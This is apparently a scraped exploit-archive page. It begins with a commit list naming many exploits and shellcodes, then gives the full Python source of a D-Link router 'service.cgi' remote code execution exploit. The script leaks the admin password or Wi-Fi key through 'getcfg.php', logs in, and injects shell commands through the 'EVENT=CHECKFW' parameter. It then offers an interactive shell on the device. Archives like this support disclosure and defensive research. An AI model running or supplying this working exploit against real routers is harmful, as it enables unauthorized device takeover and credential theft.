81d6f781ab
31 changes to exploits/shellcodes MiniUPnP MiniUPnPc < 2.0 - Remote Denial of Service Android - Hardware Service Manager Arbitrary Service Replacement due to getpidcon Microsoft Windows - NTFS Owner/Mandatory Label Privilege Bypass Microsoft Windows - NtImpersonateAnonymousToken AC to Non-AC Privilege Escalation Microsoft Windows - NtImpersonateAnonymousToken LPAC to Non-LPAC Privilege Escalation Microsoft Windows SMB Server (v1/v2) - Mount Point Arbitrary Device Open Privilege Escalation macOS - 'process_policy' Stack Leak Through Uninitialized Field Microsoft Edge Chakra - 'AppendLeftOverItemsFromEndSegment' Out-of-Bounds Read Jungo Windriver 12.5.1 - Privilege Escalation Jungo Windriver 12.5.1 - Local Privilege Escalation Parity Browser < 1.6.10 - Bypass Same Origin Policy Python smtplib 2.7.11 / 3.4.4 / 3.5.1 - Man In The Middle StartTLS Stripping VideoCharge Studio 2.12.3.685 - 'GetHttpResponse()' MITM Remote Code Execution VideoCharge Studio 2.12.3.685 - 'GetHttpResponse()' Man In The Middle Remote Code Execution Granding MA300 - Traffic Sniffing MitM Fingerprint PIN Disclosure Granding MA300 - Traffic Sniffing Man In The Middle Fingerprint PIN Disclosure LabF nfsAxe 3.7 FTP Client - Stack Buffer Overflow (Metasploit) phpCollab 2.5.1 - Unauthenticated File Upload (Metasploit) eVestigator Forensic PenTester - MITM Remote Code Execution eVestigator Forensic PenTester - Man In The Middle Remote Code Execution BestSafe Browser - MITM Remote Code Execution BestSafe Browser - Man In The Middle Remote Code Execution SKILLS.com.au Industry App - MITM Remote Code Execution Virtual Postage (VPA) - MITM Remote Code Execution SKILLS.com.au Industry App - Man In The Middle Remote Code Execution Virtual Postage (VPA) - Man In The Middle Remote Code Execution Trend Micro OfficeScan 11.0/XG (12.0) - MITM Remote Code Execution Trend Micro OfficeScan 11.0/XG (12.0) - Man In The Middle Remote Code Execution SAP NetWeaver J2EE Engine 7.40 - SQL Injection D-Link Routers 110/412/615/815 < 1.03 - 'service.cgi' Arbitrary Code Execution FreeBSD/x86 - Reverse TCP Shell (192.168.1.69:6969/TCP) Shellcode (129 bytes) BSD/x86 - Reverse TCP Shell (192.168.2.33:6969/TCP) Shellcode (129 bytes) FreeBSD/x86 - Bind TCP Password Shell (4883/TCP) Shellcode (222 bytes) FreeBSD/x86 - Bind TCP Password /bin/sh Shell (4883/TCP) Shellcode (222 bytes) Cisco IOS - New TTY / Privilege Level To 15 / Reverse Virtual Terminal Shell (21/TCP) Shellcode Cisco IOS/PowerPC - New VTY + Password (1rmp455) Shellcode (116 bytes) Cisco IOS - New TTY / Privilege Level To 15 / No Password Shellcode HPUX - execve /bin/sh Shellcode (58 bytes) Cisco IOS - New TTY + Privilege Level To 15 + Reverse Virtual Terminal Shell (21/TCP) Shellcode Cisco IOS/PowerPC - New VTY + Password (1rmp455) Shellcode (116 bytes) Cisco IOS - New TTY + Privilege Level To 15 + No Password Shellcode HP-UX - execve /bin/sh Shellcode (58 bytes) OpenBSD/x86 - execve /bin/sh Shellcode (23 Bytes) OpenBSD/x86 - execve /bin/sh Shellcode (23 bytes) ARM - Bind TCP Shell (0x1337/TCP) Shellcode ARM - Bind TCP Listener (68/UDP) + Reverse TCP Shell (192.168.0.1:67/TCP) Shellcode ARM - Bind TCP Listener (0x1337/TCP) + Receive Shellcode + Payload Loader Shellcode ARM - ifconfig eth0 192.168.0.2 up Shellcode Linux/ARM - Bind TCP Shell (0x1337/TCP) Shellcode Linux/ARM - Bind TCP Listener (68/UDP) + Reverse TCP Shell (192.168.0.1:67/TCP) Shellcode Linux/ARM - Bind TCP Listener (0x1337/TCP) + Receive Shellcode + Payload Loader Shellcode Linux/ARM - ifconfig eth0 192.168.0.2 up Shellcode FreeBSD/x86 - Bind TCP Shell (31337/TCP) + Fork Shellcode (111 bytes) FreeBSD/x86 - Bind TCP /bin/sh Shell (31337/TCP) + Fork Shellcode (111 bytes) Windows x86 - Reverse TCP Shell (192.168.232.129:4444/TCP) + Persistent Access Shellcode (494 Bytes) Windows x86 - Reverse TCP Shell (192.168.232.129:4444/TCP) + Persistent Access Shellcode (494 bytes) Windows 7 x86 - Bind TCP Shell (4444/TCP) Shellcode (357 Bytes) Windows 7 x86 - Bind TCP Shell (4444/TCP) Shellcode (357 bytes) Windows x86 - Reverse TCP Staged Alphanumeric Shell (127.0.0.1:4444/TCP) Shellcode (332 Bytes) Windows x86 - Reverse TCP Staged Alphanumeric Shell (127.0.0.1:4444/TCP) Shellcode (332 bytes) Linux/x86 - exceve /bin/sh Encoded Shellcode (44 Bytes) Linux/ARM (Raspberry Pi) - Bind TCP /bin/sh Shell (0.0.0.0:4444/TCP) Null-Free Shellcode (112 bytes) FreeBSD/x86-64 - execve /bin/sh Shellcode (28 bytes) FreeBSD/x86-64 - Bind TCP Password (R2CBw0cr) /bin/sh Shell Shellcode (127 bytes) FreeBSD/x86 - execv(/bin/sh) Shellcode (23 bytes) FreeBSD/x86 - //sbin/pfctl -F all Shellcode (47 bytes) FreeBSD/x86 - Bind TCP /bin/sh Shell (41254/TCP) Shellcode (115 bytes) FreeBSD - reboot() Shellcode (15 Bytes) IRIX - execve(/bin/sh -c) Shellcode (72 bytes) IRIX - execve(/bin/sh) Shellcode (43 bytes) IRIX - Bind TCP /bin/sh Shell Shellcode (364 bytes) IRIX - execve(/bin/sh) Shellcode (68 bytes) IRIX - stdin-read Shellcode (40 bytes) Linux/ARM - execve(_/bin/sh__ NULL_ 0) Shellcode (34 bytes) Linux/x86 - exceve /bin/sh Encoded Shellcode (44 bytes) Linux/x86 - Read /etc/passwd Shellcode (54 Bytes) Linux/x86 - Read /etc/passwd Shellcode (54 bytes) Linux/x86-64 - execve /bin/sh Shellcode (21 Bytes) Linux/x86-64 - execve /bin/sh Shellcode (21 bytes)
233 lines
No EOL
6.9 KiB
Python
Executable file
233 lines
No EOL
6.9 KiB
Python
Executable file
#!/usr/bin/python
|
|
|
|
# Exploit Title: D-Link WAP 615/645/815 < 1.03 service.cgi RCE
|
|
# Exploit Author: Cr0n1c
|
|
# Vendor Homepage: us.dlink.com
|
|
# Software Link: https://github.com/Cr0n1c/dlink_shell_poc/blob/master/dlink_auth_rce
|
|
# Version: 1.03
|
|
# Tested on: D-Link 815 v1.03
|
|
|
|
import argparse
|
|
import httplib
|
|
import random
|
|
import re
|
|
import requests
|
|
import string
|
|
import urllib2
|
|
|
|
DLINK_REGEX = ['Product Page : <a href="http://support.dlink.com" target="_blank">(.*?)<',
|
|
'<div class="modelname">(.*?)</div>',
|
|
'<div class="pp">Product Page : (.*?)<a href="javascript:check_is_modified">'
|
|
]
|
|
|
|
|
|
def dlink_detection():
|
|
try:
|
|
r = requests.get(URL, timeout=10.00)
|
|
except requests.exceptions.ConnectionError:
|
|
print "Error: Failed to connect to " + URL
|
|
return False
|
|
|
|
if r.status_code != 200:
|
|
print "Error: " + URL + " returned status code " + str(r.status_code)
|
|
return False
|
|
|
|
for rex in DLINK_REGEX:
|
|
if re.search(rex, r.text):
|
|
res = re.findall(rex, r.text)[0]
|
|
return res
|
|
|
|
print "Warning: Unable to detect device for " + URL
|
|
return "Unknown Device"
|
|
|
|
|
|
def create_session():
|
|
post_content = {"REPORT_METHOD": "xml",
|
|
"ACTION": "login_plaintext",
|
|
"USER": "admin",
|
|
"PASSWD": PASSWORD,
|
|
"CAPTCHA": ""
|
|
}
|
|
|
|
try:
|
|
r = requests.post(URL + "/session.cgi", data=post_content, headers=HEADER)
|
|
except requests.exceptions.ConnectionError:
|
|
print "Error: Failed to access " + URL + "/session.cgi"
|
|
return False
|
|
|
|
if not (r.status_code == 200 and r.reason == "OK"):
|
|
print "Error: Did not recieve a HTTP 200"
|
|
return False
|
|
|
|
if not re.search("<RESULT>SUCCESS</RESULT>", r.text):
|
|
print "Error: Did not get a success code"
|
|
return False
|
|
|
|
return True
|
|
|
|
|
|
def parse_results(result):
|
|
print result[100:]
|
|
return result
|
|
|
|
|
|
def send_post(command, print_res=True):
|
|
post_content = "EVENT=CHECKFW%26" + command + "%26"
|
|
|
|
method = "POST"
|
|
|
|
if URL.lower().startswith("https"):
|
|
handler = urllib2.HTTPSHandler()
|
|
else:
|
|
handler = urllib2.HTTPHandler()
|
|
|
|
opener = urllib2.build_opener(handler)
|
|
request = urllib2.Request(URL + "/service.cgi", data=post_content, headers=HEADER)
|
|
request.get_method = lambda: method
|
|
|
|
try:
|
|
connection = opener.open(request)
|
|
except urllib2.HTTPError:
|
|
print "Error: failed to connect to " + URL + "/service.cgi"
|
|
return False
|
|
except urllib2.HTTPSError:
|
|
print "Error: failed to connect to " + URL + "/service.cgi"
|
|
return False
|
|
|
|
if not connection.code == 200:
|
|
print "Error: Recieved status code " + str(connection.code)
|
|
return False
|
|
|
|
attempts = 0
|
|
|
|
while attempts < 5:
|
|
try:
|
|
data = connection.read()
|
|
except httplib.IncompleteRead:
|
|
attempts += 1
|
|
else:
|
|
break
|
|
|
|
if attempts == 5:
|
|
print "Error: Chunking failed %d times, bailing." %attempts
|
|
return False
|
|
|
|
if print_res:
|
|
return parse_results(data)
|
|
else:
|
|
return data
|
|
|
|
|
|
def start_shell():
|
|
print "+" + "-" * 80 + "+"
|
|
print "| Welcome to D-Link Shell" + (" " * 56) + "|"
|
|
print "+" + "-" * 80 + "+"
|
|
print "| This is a limited shell that exploits piss poor programming. I created this |"
|
|
print "| to give you a comfort zone and to emulate a real shell environment. You will |"
|
|
print "| be limited to basic busybox commands. Good luck and happy hunting. |"
|
|
print "|" + (" " * 80) + "|"
|
|
print "| To quit type 'gtfo'" + (" " * 60) + "|"
|
|
print "+" + "-" * 80 + "+\n\n"
|
|
|
|
cmd = ""
|
|
|
|
while True:
|
|
cmd = raw_input(ROUTER_TYPE + "# ").strip()
|
|
if cmd.lower() == "gtfo":
|
|
break
|
|
|
|
send_post(cmd)
|
|
|
|
|
|
def query_getcfg(param):
|
|
post_data = {"SERVICES": param}
|
|
try:
|
|
r = requests.post(URL + "/getcfg.php", data=post_data, headers=HEADER)
|
|
except requests.exceptions.ConnectionError:
|
|
print "Error: Failed to access " + URL + "/getcfg.php"
|
|
return False
|
|
|
|
if not (r.status_code == 200 and r.reason == "OK"):
|
|
print "Error: Did not recieve a HTTP 200"
|
|
return False
|
|
|
|
if re.search("<message>Not authorized</message>", r.text):
|
|
print "Error: Not vulnerable"
|
|
return False
|
|
|
|
return r.text
|
|
|
|
|
|
def attempt_password_find():
|
|
# Going fishing in DEVICE.ACCOUNT looking for CWE-200 or no password
|
|
data = query_getcfg("DEVICE.ACCOUNT")
|
|
if not data:
|
|
return False
|
|
|
|
res = re.findall("<password>(.*?)</password>", data)
|
|
if len(res) > 0 and res != "=OoXxGgYy=":
|
|
return res[0]
|
|
|
|
# Did not find it in first attempt
|
|
data = query_getcfg("WIFI")
|
|
if not data:
|
|
return False
|
|
|
|
res = re.findall("<key>(.*?)</key>", data)
|
|
if len(res) > 0:
|
|
return res[0]
|
|
|
|
# All attempts failed, just going to return and wish best of luck!
|
|
return False
|
|
|
|
|
|
if __name__ == "__main__":
|
|
parser = argparse.ArgumentParser(description="D-Link 615/815 Service.cgi RCE")
|
|
|
|
parser.add_argument("-p", "--password", dest="password", action="store", default=None,
|
|
help="Password for the router. If not supplied then will use blank password.")
|
|
parser.add_argument("-u", "--url", dest="url", action="store", required=True,
|
|
help="[Required] URL for router (i.e. http://10.1.1.1:8080)")
|
|
parser.add_argument("-x", "--attempt-exploit", dest="attempt_exploit", action="store_true", default=False,
|
|
help="If flag is set, will attempt CWE-200. If that fails, then will attempt to discover "
|
|
"wifi password and use it.")
|
|
|
|
args = parser.parse_args()
|
|
|
|
HEADER = {"Cookie": "uid=" + "".join(random.choice(string.letters) for _ in range(10)),
|
|
"Host": "localhost",
|
|
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"
|
|
}
|
|
|
|
URL = args.url.lower().strip()
|
|
|
|
if not URL.startswith("http"):
|
|
URL = "http://" + URL
|
|
|
|
ROUTER_TYPE = dlink_detection()
|
|
|
|
if not ROUTER_TYPE:
|
|
print "EXITING . . ."
|
|
exit()
|
|
|
|
if args.attempt_exploit and args.password is None:
|
|
res = attempt_password_find()
|
|
if res:
|
|
PASSWORD = res
|
|
else:
|
|
PASSWORD = ""
|
|
print "[+] Switching password to: " + PASSWORD
|
|
elif args.password:
|
|
PASSWORD = args.password
|
|
else:
|
|
PASSWORD = ""
|
|
|
|
if not create_session():
|
|
print "EXITING . . ."
|
|
exit()
|
|
|
|
if len(send_post("ls", False)) == 0:
|
|
print "Appears this device [%s] is not vulnerable. EXITING . . ." %ROUTER_TYPE
|
|
exit()
|
|
|
|
start_shell() |